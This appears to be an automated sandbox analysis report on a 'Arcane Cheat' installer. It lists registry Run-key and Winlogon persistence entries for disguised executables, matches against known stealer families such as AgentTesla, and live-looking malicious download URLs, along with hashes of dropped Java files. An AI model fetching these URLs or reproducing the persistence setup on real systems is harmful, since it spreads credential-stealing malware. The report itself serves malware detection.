            09:02:31 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRd "C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe"
            09:02:43 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Recovery\explorer.exe"
            09:02:53 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WinStore.App "C:\Surrogateprovidercomponentsessionmonitor\WinStore.App.exe"
            09:03:02 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
            09:03:11 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run audiodg "C:\Windows\addins\audiodg.exe"
            09:03:19 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRd "C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe"
            09:03:29 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Recovery\explorer.exe"
            09:03:37 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WinStore.App "C:\Surrogateprovidercomponentsessionmonitor\WinStore.App.exe"
            09:03:46 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
            09:03:55 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run audiodg "C:\Windows\addins\audiodg.exe"
            09:04:06 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRd "C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe"
            09:04:14 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Recovery\explorer.exe"
            09:04:24 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WinStore.App "C:\Surrogateprovidercomponentsessionmonitor\WinStore.App.exe"
            09:04:42 | Autostart | Run: WinLogon Shell "C:\Recovery\RuntimeBroker.exe"

            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            208.95.112.1 | SecuriteInfo.com.FileRepMalware.1834.13764.exe | malicious | Discord Token Stealer, XWorm | ip-api.com/line/?fields=hosting
            208.95.112.1 | NFs_468.msi | malicious | VMdetect | ip-api.com/json/
            208.95.112.1 | z23mypdfscanner-invoice3535.bat | malicious | AgentTesla | ip-api.com/line/?fields=hosting
            208.95.112.1 | 2aFb7hE00o.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
            208.95.112.1 | documentos.xlam.xlsx | malicious | AgentTesla | ip-api.com/line/?fields=hosting
            208.95.112.1 | 6743.pdf.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
            208.95.112.1 | W0Gtjt6n6J.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
            208.95.112.1 | VwjpUyPk2S.exe | malicious | Python Stealer, Monster Stealer | ip-api.com/json
            208.95.112.1 | QUOTATION_MAYQTRA031244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
            208.95.112.1 | HSBCR22022121218457670.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            ip-api.com | SecuriteInfo.com.FileRepMalware.1834.13764.exe | malicious | Discord Token Stealer, XWorm | 208.95.112.1
            ip-api.com | NFs_468.msi | malicious | VMdetect | 208.95.112.1
            ip-api.com | z23mypdfscanner-invoice3535.bat | malicious | AgentTesla | 208.95.112.1
            ip-api.com | 2aFb7hE00o.exe | malicious | AgentTesla | 208.95.112.1
            ip-api.com | documentos.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
            ip-api.com | 6743.pdf.exe | malicious | AgentTesla | 208.95.112.1
            ip-api.com | W0Gtjt6n6J.exe | malicious | AgentTesla | 208.95.112.1
            ip-api.com | VwjpUyPk2S.exe | malicious | Python Stealer, Monster Stealer | 208.95.112.1
            ip-api.com | QUOTATION_MAYQTRA031244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
            ip-api.com | HSBCR22022121218457670.exe | malicious | AgentTesla | 208.95.112.1
            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            TUT-AS US | SecuriteInfo.com.FileRepMalware.1834.13764.exe | malicious | Discord Token Stealer, XWorm | 208.95.112.1
            TUT-AS US | NFs_468.msi | malicious | VMdetect | 208.95.112.1
            TUT-AS US | z23mypdfscanner-invoice3535.bat | malicious | AgentTesla | 208.95.112.1
            TUT-AS US | 2aFb7hE00o.exe | malicious | AgentTesla | 208.95.112.1
            TUT-AS US | documentos.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
            TUT-AS US | 6743.pdf.exe | malicious | AgentTesla | 208.95.112.1
            TUT-AS US | W0Gtjt6n6J.exe | malicious | AgentTesla | 208.95.112.1
            TUT-AS US | VwjpUyPk2S.exe | malicious | Python Stealer, Monster Stealer | 208.95.112.1
            TUT-AS US | QUOTATION_MAYQTRA031244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
            TUT-AS US | HSBCR22022121218457670.exe | malicious | AgentTesla | 208.95.112.1
            No context
            Match | Associated Sample Name / URL | Detection | Threat Name
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge-32.dll (copy) | Advanced_IP_Scanner_2.5.4594.1 (1).exe | malicious | Unknown
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge-32.dll (copy) | New Soft Update.exe | malicious | Unknown
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge-32.dll (copy) | https://uceg-klom.us21.list-manage.com/track/click?u=9b882a29c7ab3b3f6381abd18&id=56bb8add24&e=4fba4902f9x | malicious | Unknown
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge-32.dll (copy) | https://cdn.discordapp.com/attachments/1174332456720154685/1174332513909477499/orderCase_21-50821.zip | malicious | Unknown
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge-32.dll (copy) | https://soft-got.host/vgc/NordVPN-10_11.zip | malicious | Unknown
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge.dll (copy) | Advanced_IP_Scanner_2.5.4594.1 (1).exe | malicious | Unknown
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge.dll (copy) | New Soft Update.exe | malicious | Unknown
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge.dll (copy) | https://uceg-klom.us21.list-manage.com/track/click?u=9b882a29c7ab3b3f6381abd18&id=56bb8add24&e=4fba4902f9x | malicious | Unknown
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge.dll (copy) | https://cdn.discordapp.com/attachments/1174332456720154685/1174332513909477499/orderCase_21-50821.zip | malicious | Unknown
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge.dll (copy) | https://soft-got.host/vgc/NordVPN-10_11.zip | malicious | Unknown
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Category:dropped
                                Size (bytes):32768
                                Entropy (8bit):5.870513185862986
                                Encrypted:false
                                SSDEEP:384:UoI1gYZw33FUWUcC6TBhdsDgZH4o5NEvdlcn0ScPmPn0Avsl9EPg/s4Xsn+KvHKj:G7Zw33FNUf6Nhd/fQ1l+0vM0iT9
                                MD5:CA86297E7A02A2C1E91C4ECC897B7DCC
                                SHA1:A2E3EAE2DD5BAD41F349818F004DBE1BA89C1E89
                                SHA-256:8C3E900295AA5A4571719CCF6AC6739FEBFF2865755F1E75C38433C29283A67A
                                SHA-512:6613575793250F50C9A319B6F1CD758D9D74651B1AB1DA366A99D308C3384ECF4AD240A8AA14BC6D3C547DBE283FB8B9055AEDA73573CD784A8AA43C79B97C2E
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 3%
                                • Antivirus: Virustotal, Detection: 0%
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Category:dropped
                                Size (bytes):32768
                                Entropy (8bit):5.870513185862986
                                Encrypted:false
                                SSDEEP:384:UoI1gYZw33FUWUcC6TBhdsDgZH4o5NEvdlcn0ScPmPn0Avsl9EPg/s4Xsn+KvHKj:G7Zw33FNUf6Nhd/fQ1l+0vM0iT9
                                MD5:CA86297E7A02A2C1E91C4ECC897B7DCC
                                SHA1:A2E3EAE2DD5BAD41F349818F004DBE1BA89C1E89
                                SHA-256:8C3E900295AA5A4571719CCF6AC6739FEBFF2865755F1E75C38433C29283A67A
                                SHA-512:6613575793250F50C9A319B6F1CD758D9D74651B1AB1DA366A99D308C3384ECF4AD240A8AA14BC6D3C547DBE283FB8B9055AEDA73573CD784A8AA43C79B97C2E
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 3%
                                • Antivirus: Virustotal, Detection: 0%
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1197769
                                Entropy (8bit):6.370122940595945
                                Encrypted:false
                                SSDEEP:24576:eEZXjiinrzY5tO+uKE3LMT0jECZQEbLBDBEnFWsyb7xyxe:DdmbjTKlD00R5
                                MD5:4814AD2A8419A2C574930F6D70B6F76F
                                SHA1:DD09A6C66B6AE9F3194BE22A13FD353F020D809F
                                SHA-256:D51C94FA83722B0DD27869ECF539DA3E4A9DC4D6C30B01CCD6A2F37C632F17E2
                                SHA-512:4DAE11B817CA9529859E2A15DE0A8B7C7B3CC6A5572026A3C707505938F3374ACF522EC925EFBE0782CCB325BC6683E1111A21FDB1E21CB7C4FD6BE9323D784A
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 3%
                                • Antivirus: Virustotal, Detection: 0%
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ISO-8859 text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):3313
                                Entropy (8bit):4.557128068430301
                                Encrypted:false
                                SSDEEP:96:a58tiSm9iicC7CRRS9i7cq11iUDcsMLks0h9n:WOi59rcF/Cigq11iUD5MLks0z
                                MD5:FC605D978E7825595D752DF2EF03F8AF
                                SHA1:C493C9541CAAEE4BFE3B3E48913FD9DF7809299F
                                SHA-256:7D697EAA9ACF50FE0B57639B3C62FF02916DA184F191944F49ECA93D0BB3374F
                                SHA-512:FB811DE6A2B36B28CA904224EA3525124BD4628CA9618C70EB9234AB231A09C1B1F28D9B6301581A4FA2E20F1036D5E1C3D6F1BF316C7FE78EF6EDEAE50EA40E
                                Malicious:false
                                Preview:Copyright . 1993, 2016, Oracle and/or its affiliates...All rights reserved.....This software and related documentation are provided under a..license agreement containing restrictions on use and..disclosure and are protected by intellectual property laws...Except as expressly permitted in your license agreement or..allowed by law, you may not use, copy, reproduce, translate,..broadcast, modify, license, transmit, distribute, exhibit,..perform, publish, or display any part, in any form, or by..any means. Reverse engineering, disassembly, or..decompilation of this software, unless required by law for..interoperability, is prohibited.....The information contained herein is subject to change..without notice and is not warranted to be error-free. If you..find any errors, please report them to us in writing.....If this is software or related documentation that is..delivered to the U.S. Government or anyone licensing it on..behalf of the U.S. Government, the following notice is..applicable:...
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):41
                                Entropy (8bit):4.271470906740504
                                Encrypted:false
                                SSDEEP:3:c3AXFshzhRSkv:c9hzhgkv
                                MD5:67CB88F6234B6A1F2320A23B197FA3F6
                                SHA1:877ACEBA17B28CFFF3F5DF664E03B319F23767A1
                                SHA-256:263E21F4B43C118A8B4C07F1A8ACB11CAFC232886834433E34187F5663242360
                                SHA-512:4D43E5EDECAB92CEBD853204C941327DCCBFD071A71F066C12F7FB2F1B2DEF59C37A15CE05C4FE06EC2EA296B8630C4E938254A8A92E149E4A0A82C4307D648F
                                Malicious:false
                                Preview:Please refer to http://java.com/license..
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):47
                                Entropy (8bit):4.2563005536211715
                                Encrypted:false
                                SSDEEP:3:c3AXFshzhRSkjn:c9hzhgkjn
                                MD5:4BDA1F1B04053DCFE66E87A77B307BB1
                                SHA1:B8B35584BE24BE3A8E1160F97B97B2226B38FA7D
                                SHA-256:FD475B1619675B9FB3F5CD11D448B97EDDEE8D1F6DDCCA13DED8BC6E0CAA9CF3
                                SHA-512:997CEE676018076E9E4E94D61EC94D5B69B148B3152A0148E70D0BE959533A13AD0BC1E8B43268F91DB08B881BF5050A6D5C157D456597260A2B332A48068980
                                Malicious:false
                                Preview:Please refer to http://java.com/licensereadme..
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):111645
                                Entropy (8bit):4.8590909329531025
                                Encrypted:false
                                SSDEEP:1536:iiVRF8bLuepEvc5O5YwT3JJ4WOHHA/AFjrlHyEepdfZ9JIH4gDq:dRMiCOjJJ4pg/0Hx9MlZ9KH47
                                MD5:0E05BD8B9BFCF17F142445D1F8C6561C
                                SHA1:CF0A9F4040603008891AA0731ABF89CE2403F2FB
                                SHA-256:C3EA3996241B8E9AE7DB3780E470174076FD2003D8AEFAA77BF0BAB5E04DE050
                                SHA-512:07C7865D31D22BA0C68E384AFEDC22261F7B3A82BEBC9324145FF7F631623ECA2DC31C71CDBBFC9FEBC1733451A095302DE2A0877821A5B68038E350969BF460
                                Malicious:false
                                Preview:.DO NOT TRANSLATE OR LOCALIZE....***************************************************************************....%%The following software may be included in this product:..Microsoft DirectShow - Base Classes....Use of any of this software is governed by the terms of the license below:....MSDN - Information on Terms of Use....Updated: February 13, 2008....ON THIS PAGE.... * ACCEPTANCE OF TERMS.. * PRIVACY AND PROTECTION OF PERSONAL INFORMATION.. * NOTICE SPECIFIC TO APIs AVAILABLE ON THIS WEB SITE.. * NOTICE SPECIFIC TO SOFTWARE AVAILABLE ON THIS WEB SITE.. * NOTICE SPECIFIC TO DOCUMENTATION AVAILABLE ON THIS WEB SITE.. * NOTICES REGARDING SOFTWARE, DOCUMENTATION, APIS AND SERVICES AVAILABLE ON..THIS WEB SITE.. * RESERVATION OF RIGHTS.. * MEMBER ACCOUNT, PASSWORD, AND SECURITY.. * NO UNLAWFUL OR PROHIBITED USE.. * USE OF SERVICES.. * MATERIALS PROVIDED TO MICROSOFT OR POSTED AT ANY MICROSOFT WEB SITE.. * NOTICES AND PROCEDURE FOR MAKING CLAIMS OF COP
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):180668
                                Entropy (8bit):5.064180003233063
                                Encrypted:false
                                SSDEEP:3072:54ct+BcF1N7m8arf1kHRSusX2NyJ9KH4PF4j52eTjLAzE7GzmCK+XNhalQxkM8QB:N7mtrf1GhMF4j5RMGQoyzaXmR
                                MD5:0E87879F452892B85C81071A1DDD5A2A
                                SHA1:2CF97C1A84374A6FBBD5D97FE1B432FA799C3B19
                                SHA-256:9C18836FD0B5E4B0C57CFFDB74574FA5549085C3B327703DC8EFE4208F4E3321
                                SHA-512:10BA68FFD9DEAB10A0B200707C3AF9E95E27AED004F66F049D41310CB041B7618EE017219C848912D5951599208D385BCB928DD33175652101C7E5BC2E3EBA5B
                                Malicious:false
                                Preview:DO NOT TRANSLATE OR LOCALIZE...-----------------------------....%% This notice is provided with respect to ASM Bytecode Manipulation ..Framework v5.0.3, which may be included with JRE 8, and JDK 8, and ..OpenJDK 8.....--- begin of LICENSE ---....Copyright (c) 2000-2011 France T.l.com..All rights reserved.....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions..are met:....1. Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer.....2. Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution.....3. Neither the name of the copyright holders nor the names of its.. contributors may be used to endorse or promote products derived from.. this software without specific prior written
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:HTML document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):983
                                Entropy (8bit):5.135635144562017
                                Encrypted:false
                                SSDEEP:24:+STATDcxWpAVjXQ5cjaJ2gjQo4OSED6R8R/TtDpM:+STATD7pqjXBeJdso4OnxRc
                                MD5:3CB773CB396842A7A43AD4868A23ABE5
                                SHA1:ACE737F039535C817D867281190CA12F8B4D4B75
                                SHA-256:F450AEE7E8FE14512D5A4B445AA5973E202F9ED1E122A8843E4DC2D4421015F0
                                SHA-512:6058103B7446B61613071C639581F51718C12A9E7B6ABD3CF3047A3093C2E54B2D9674FAF9443570A3BB141F839E03067301FF35422EB9097BD08020E0DD08A4
                                Malicious:false
                                Preview:<html>..<head>..<title>..Welcome to the Java(TM) Platform..</title>..</head>..<body>....<h2>Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Platform</h2>..<p> Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Standard Edition Runtime .. Environment. This provides complete runtime support for Java applications. ..<p> The runtime environment includes the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> .. Plug-in product which supports the Java environment inside web browsers. ..<h3>References</h3>..<p>..See the <a href="http://download.oracle.com/javase/7/docs/technotes/guides/plugin/">Java Plug-in</a> product..documentation for more information on using the Java Plug-in product...<p> See the <a href=.."http://www.oracle.com/technetwork/java/javase/overview/"..>Java Platform</a> web site for .. more information on the Java Platform. ..<hr>..<font size="-2">..Copyright (c) 2006, 2016, Oracle and/or its affiliates. All rights reserved...</font>..<p>..</body>..</html>..
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):14912
                                Entropy (8bit):6.141852308272967
                                Encrypted:false
                                SSDEEP:192:7pQMhM63XLPVT6MsMPapRuBUEp7nYe+PjPriT0fwtK:7muL7PV4aapRuBTp7nYPLr7J
                                MD5:D63933F4E279A140CC2A941CCFF38348
                                SHA1:75169BE2E9BCFE20674D72D43CA6E2BC4A5A9382
                                SHA-256:532D049E0D7A265754902C23B0F150D665A78A3D6FE09AD51C9BE8C29D574A3D
                                SHA-512:D7A5023A5EB9B0C3B2AD6F55696A166F07FA60F9D1A12D186B23AAAACC92EF948CB5DFFA013AFC90C4BBE3DE077D591185902384F677D0BAE2FF7CFD5DB5E06C
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%
                                Joe Sandbox View:
                                • Filename: Advanced_IP_Scanner_2.5.4594.1 (1).exe, Detection: malicious
                                • Filename: New Soft Update.exe, Detection: malicious
                                • Filename: , Detection: malicious
                                • Filename: , Detection: malicious
                                • Filename: , Detection: malicious
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):14912
                                Entropy (8bit):6.1347115439165085
                                Encrypted:false
                                SSDEEP:192:0Usw4DPU3XLPVT6GsKOhWIutUinYe+PjPriT0fwyI8:ew7PVIKyWIutDnYPLr728
                                MD5:B4EB9B43C293074406ADCA93681BF663
                                SHA1:16580FB7139D06A740F30D34770598391B70AC96
                                SHA-256:8CD69AF7171F24D57CF1E6D0D7ACD2B35B4EA5FDF55105771141876A67917C52
                                SHA-512:A4E999E162B5083B6C6C3EAFEE4D84D1EC1C61DCA6425F849F352FFDCCC2E44DFEE0625C210A8026F9FF141409EEBF9EF15A779B26F59B88E74B6A2CE2E82EF9
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%
                                Joe Sandbox View:
                                • Filename: Advanced_IP_Scanner_2.5.4594.1 (1).exe, Detection: malicious
                                • Filename: New Soft Update.exe, Detection: malicious
                                • Filename: , Detection: malicious
                                • Filename: , Detection: malicious
                                • Filename: , Detection: malicious
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):128064
                                Entropy (8bit):6.428684952829155
                                Encrypted:false
                                SSDEEP:3072:uN77TJSG78+5Orcj5K/e2Hrgc6kZAn1yEkBKMKy1Zf22QYHJiuzTl8ShzzM+64mn:uNXd178+5fJZnQLo
                                MD5:2F808ED0642BD5CF8D4111E0AF098BBB
                                SHA1:006163A07052F3D227C2E541691691B4567F5550
                                SHA-256:61DFB6126EBA8D5429F156EAAB24FF30312580B0ABE4009670F1DD0BC64F87BB
                                SHA-512:27DBDA3A922747A031FF7434DE5A596725FF5AE2BC6DD83D6D5565EB2BA180B0516896323294459997B545C60C9E06DA6C2D8DD462A348A6759A404DB0F023A7
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):127552
                                Entropy (8bit):6.413283221897154
                                Encrypted:false
                                SSDEEP:3072:SdQ4jWJt4XChlFavveKSQ4gHK/e2Hrgc6kZAn1y1koKMKy1Zf22QYHJiuzTl8ShM:Sy4SJ1TFavvehc7ZnwEr
                                MD5:C3DED5F41E28FAF89338FB46382E4C3E
                                SHA1:6F77920776D39550355B146D672C199A3941F908
                                SHA-256:4691603DFABE6D7B7BEAC887DADC0E96243C2FF4F9A88CE3793E93356C53AA08
                                SHA-512:23621F2856899F40CFA9858DC277372BFE39F0205377543EB23E94422D479A53FDF664F4A9A4515C2285811F01D91AB64A834A03A4D3AB0CB7D78F8AF11135FF
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):97856
                                Entropy (8bit):6.467907542894502
                                Encrypted:false
                                SSDEEP:1536:/fHGbDtpt+WfGegcX30EJ4YHiYmRkgAPe+GP8uWg1kQOPt:/w2WfGe/30EWbY4Z+GpWuHOPt
                                MD5:F78D2BF2C551BE9DF6A2F3210A2964C1
                                SHA1:B6A4160ECA4C0D0552234FF69BCFDF45F0A2A352
                                SHA-256:9D18E5421A8606985FA54D7CEA921D1B8930358A2E4CDF5FDF2A8B3E4D857288
                                SHA-512:AAC8622683BE57518F8B03198A03BF1F760E082692C1FB6252E96CDBA19D3CEB0A6786CCBD7B98830E865297308FA99DBBEA464E41041ABDDA18AEB862BA993F
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):95808
                                Entropy (8bit):6.48897048228647
                                Encrypted:false
                                SSDEEP:1536:EHSB4i2hJwZaDEoDVzkhbyJCAqn9nV+1vkJnHBoY8BK5Hj:EJJwZWEoDVYby81yiBovkHj
                                MD5:E5A6231FE1E6FEC5F547DFD845D209BC
                                SHA1:3F21F90ECC377B6099637D5B59593D2415450D45
                                SHA-256:51355EA8A7DC238483C8069361776103779CE9FE3CD0267770E321E6E4368366
                                SHA-512:D5D20DF0089F3217B627D39ABD57C61E026D0DC537022FB698F85FA6893C7FA348C40295DEEC78506F0EF608827D39E2F6F3538818BA25E2A0EE1145FCC95940
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1182272
                                Entropy (8bit):6.63089480914076
                                Encrypted:false
                                SSDEEP:24576:68M4H6ioDs5FELnSbY6Ck2IlAnVCXQlFg3:9eaGnkXQlFQ
                                MD5:159CCF1200C422CED5407FED35F7E37D
                                SHA1:177A216B71C9902E254C0A9908FCB46E8D5801A9
                                SHA-256:30EB581C99C8BCBC54012AA5E6084B6EF4FCEE5D9968E9CC51F5734449E1FF49
                                SHA-512:AB3F4E3851313391B5B8055E4D526963C38C4403FA74FB70750CC6A2D5108E63A0E600978FA14A7201C48E1AFD718A1C6823D091C90D77B17562B7A4C8C40365
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15424
                                Entropy (8bit):6.380726588633652
                                Encrypted:false
                                SSDEEP:384:1Td3hw/L3kKLnYgIOGOOssnPV5Lnf6onYPLr7EbH:1zw/bkKLt7KnddnfPC7S
                                MD5:A46289384F76C2A41BA7251459849288
                                SHA1:4D8EF96EDBE07C8722FA24E4A5B96EBFA18BE2C4
                                SHA-256:728D64BC1FBF48D4968B1B93893F1B5DB88B052AB82202C6840BF7886A64017D
                                SHA-512:34D62BEB1FA7D8630F5562C1E48839CE9429FAEA980561E58076DF5F19755761454EEB882790EC1035C64C654FC1A8CD5EB46ECA12E2BC81449ACBB73296C9E8
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1447
                                Entropy (8bit):4.228834598358894
                                Encrypted:false
                                SSDEEP:24:+3AKdmzfuv6pBSyGJkR/4o6kn2SRGehD+GrspGC/hLRra:BzMUBLGJkBA+RGeV+GrspGC/TO
                                MD5:F4188DEB5103B6D7015B2106938BFA23
                                SHA1:8E3781A080CD72FDE8702EB6E02A05A23B4160F8
                                SHA-256:BD54E6150AD98B444D5D24CEA9DDAFE347ED11A1AAE749F8E4D59C963E67E763
                                SHA-512:0BE9A00A48CF8C7D210126591E61531899502E694A3C3BA7C3235295E80B1733B6F399CAE58FB4F7BFF2C934DA7782D256BDF46793F814A5F25B7A811D0CB2E3
                                Malicious:false
                                Preview: -Xmixed mixed mode execution (default).. -Xint interpreted mode execution only.. -Xbootclasspath:<directories and zip/jar files separated by ;>.. set search path for bootstrap classes and resources.. -Xbootclasspath/a:<directories and zip/jar files separated by ;>.. append to end of bootstrap class path.. -Xbootclasspath/p:<directories and zip/jar files separated by ;>.. prepend in front of bootstrap class path.. -Xnoclassgc disable class garbage collection.. -Xincgc enable incremental garbage collection.. -Xloggc:<file> log GC status to a file with time stamps.. -Xbatch disable background compilation.. -Xms<size> set initial Java heap size.. -Xmx<size> set maximum Java heap size.. -Xss<size> set java thread stack size.. -Xprof output cpu profiling data.. -Xfuture enable strictest checks, an
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1447
                                Entropy (8bit):4.228834598358894
                                Encrypted:false
                                SSDEEP:24:+3AKdmzfuv6pBSyGJkR/4o6kn2SRGehD+GrspGC/hLRra:BzMUBLGJkBA+RGeV+GrspGC/TO
                                MD5:F4188DEB5103B6D7015B2106938BFA23
                                SHA1:8E3781A080CD72FDE8702EB6E02A05A23B4160F8
                                SHA-256:BD54E6150AD98B444D5D24CEA9DDAFE347ED11A1AAE749F8E4D59C963E67E763
                                SHA-512:0BE9A00A48CF8C7D210126591E61531899502E694A3C3BA7C3235295E80B1733B6F399CAE58FB4F7BFF2C934DA7782D256BDF46793F814A5F25B7A811D0CB2E3
                                Malicious:false
